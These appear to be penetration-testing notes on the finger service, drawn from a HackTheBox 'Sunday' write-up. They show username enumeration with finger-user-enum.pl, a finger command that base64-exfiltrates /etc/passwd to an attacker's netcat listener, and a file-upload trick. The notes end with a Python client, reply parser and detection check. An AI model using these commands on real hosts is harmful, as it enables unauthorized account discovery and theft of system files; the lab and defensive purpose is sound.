- The finger daemon listens on port 79, and is really a relic of a time when computers were far too trusting and open. It provides status reports on logged in users. It can also provide details about a specific user and when they last logged in and from where.
- Credit: https://0xdf.gitlab.io/2018/09/29/htb-sunday.html
PORT STATE SERVICE VERSION
79/tcp open finger Sun Solaris fingerd
- Finger is an exceedingly old protocol that is very rarely in use today.
- Nmap results can show logged in users
| finger: Login Name TTY Idle When Where\x0D
| sunny sunny pts/1 Thu 14:52 10.10.14.245 \x0D
finger @10.10.10.76
No one logged on
finger jack@10.10.10.76
jack ???
#above does not exist
finger root@10.10.10.76
Login Name TTY Idle When Where
root Super-User console <Oct 14 10:28>
#user that does exist and is logged in
finger ikeuser@10.10.10.76
Login Name TTY Idle When Where
ikeuser IKE Admin < . . . . >
#user that does exist but is not logged in
If finger returns no logged-in users, we can try to brute-force usernames. We’ll use the finger-user-enum.pl script from pentestmonkey.
root@kali:~# ./finger-user-enum.pl -U /opt/SecLists/Usernames/Names/names.txt -t 10.10.10.76
Starting finger-user-enum v1.0 ( http://pentestmonkey.net/tools/finger-user-enum )
----------------------------------------------------------
| Scan Information |
----------------------------------------------------------
Worker Processes ......... 5
Usernames file ........... /opt/SecLists/Usernames/Names/names.txt
Target count ............. 1
Username count ........... 10163
Target TCP port .......... 79
Query timeout ............ 5 secs
Relay Server ............. Not used
######## Scan started at Thu Sep 27 17:39:02 2018 #########
[email protected]: access No Access User < . . . . >..nobody4 SunOS 4.x NFS Anonym < . . . . >..
[email protected]: Login Name TTY Idle When Where..adm Admin < . . . . >..lp Line Printer Admin < . . . . >..uucp uucp Admin < . . . . >..nuucp uucp Admin < . . . . >..dladm Datalink Admin < . . . . >..listen Network Admin < . . . . >..
anne [email protected]: Login Name TTY Idle When Where..anne ???..marie ???..
[email protected]: bin ??? < . . . . >..
dee [email protected]: Login Name TTY Idle When Where..dee ???..dee ???..
jo [email protected]: Login Name TTY Idle When Where..jo ???..ann ???..
la [email protected]: Login Name TTY Idle When Where..la ???..verne ???..
[email protected]: Login Name TTY Idle When Where..lp Line Printer Admin
While working on this post, I was checking out gtfobins, and their page on finger shows how it can be used for file transfer. For example, to exfil the password file from Sunday, with the listener started locally:
root@sunday:~# finger "$(base64 /etc/passwd)"@10.10.14.5
[10.10.14.5]
root@kali:~/hackthebox/sunday-10.10.10.76# nc -lnvp 79 | base64 -d > passwd
listening on [any] 79 ...
connect to [10.10.14.5] from (UNKNOWN) [10.10.10.76] 54768
root@kali:~/hackthebox/sunday-10.10.10.76# cat passwd
root:x:0:0:Super-User:/root:/usr/bin/bash
daemon:x:1:1::/:
...[snip]...
You can upload files to a target machine as well:
root@kali:~/hackthebox/sunday-10.10.10.76# cat shell.py | base64 | nc -lp 79
root@sunday:~# finger <anyuser>@10.10.14.5 > shell.b64   # the username part is irrelevant; 10.10.14.5 is the nc listener
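As an added example (my code, not from 0xdf's post, GTFOBins or pentestmonkey's script) covering both the enumeration replies above and the file-transfer trick: a minimal RFC 1288 client, a parser that classifies Solaris-style replies into unknown / logged in / not logged in, and a listener-side check that flags the overlong base64 "usernames" the file-transfer trick produces. The TTY regex, the 32-character threshold and the sample replies are my assumptions, modelled on the output shown on this page.

```python
import base64
import re
import socket

CRLF = "\r\n"
TTY_RE = re.compile(r"^(console|pts/\d+|tty\S*)$")     # heuristic: a TTY column means an active session
B64_RE = re.compile(r"^[A-Za-z0-9+/=]{64,}$")           # heuristic: base64 blob where a username should be


def build_query(user: str = "") -> bytes:
    """RFC 1288 request: optional username followed by CRLF; an empty query lists logged-in users."""
    return (user + CRLF).encode("ascii")


def finger(host: str, user: str = "", port: int = 79, timeout: float = 5.0) -> str:
    """Send one query and return the raw reply (network helper; the checks below work offline)."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(build_query(user))
        chunks = []
        while chunk := s.recv(4096):
            chunks.append(chunk)
    return b"".join(chunks).decode("latin-1")


def parse_reply(reply: str) -> list:
    """Turn a Solaris-style reply into [{'login', 'status'}]; status is unknown|logged_in|not_logged_in."""
    entries = []
    for line in reply.replace("\r", "").splitlines():
        tokens = line.split()
        if not tokens or tokens[:2] == ["Login", "Name"] or line.startswith("No one logged on"):
            continue
        if len(tokens) > 1 and tokens[1] == "???":
            status = "unknown"           # fingerd echoed the query back: no such account
        elif any(TTY_RE.match(t) for t in tokens[1:]):
            status = "logged_in"
        else:
            status = "not_logged_in"     # real name printed, "< . . . . >" in place of TTY/When
        entries.append({"login": tokens[0], "status": status})
    return entries


def user_status(reply: str, user: str) -> str:
    """Status of one queried login, or 'unknown' if it does not appear in the reply."""
    return next((e["status"] for e in parse_reply(reply) if e["login"] == user), "unknown")


def suspicious_query(raw: str, max_len: int = 32) -> bool:
    """Defender check on an inbound query line: flag overlong or base64-looking 'usernames' (the exfil trick)."""
    q = raw.rstrip("\r\n").removeprefix("/W ")
    return len(q) > max_len or bool(B64_RE.match(q))


# Constructed samples modelled on the replies above (not captured from a live host).
ROOT_REPLY = "Login Name TTY Idle When Where\r\nroot Super-User console <Oct 14 10:28>\r\n"
IKE_REPLY = "Login Name TTY Idle When Where\r\nikeuser IKE Admin < . . . . >\r\n"
EXFIL_QUERY = base64.b64encode(b"root:x:0:0:Super-User:/root:/usr/bin/bash\n" * 2).decode() + CRLF
```

A finger honeypot or a packet capture on port 79 can feed inbound query lines to `suspicious_query`; a legitimate username never approaches the length of a base64-encoded file.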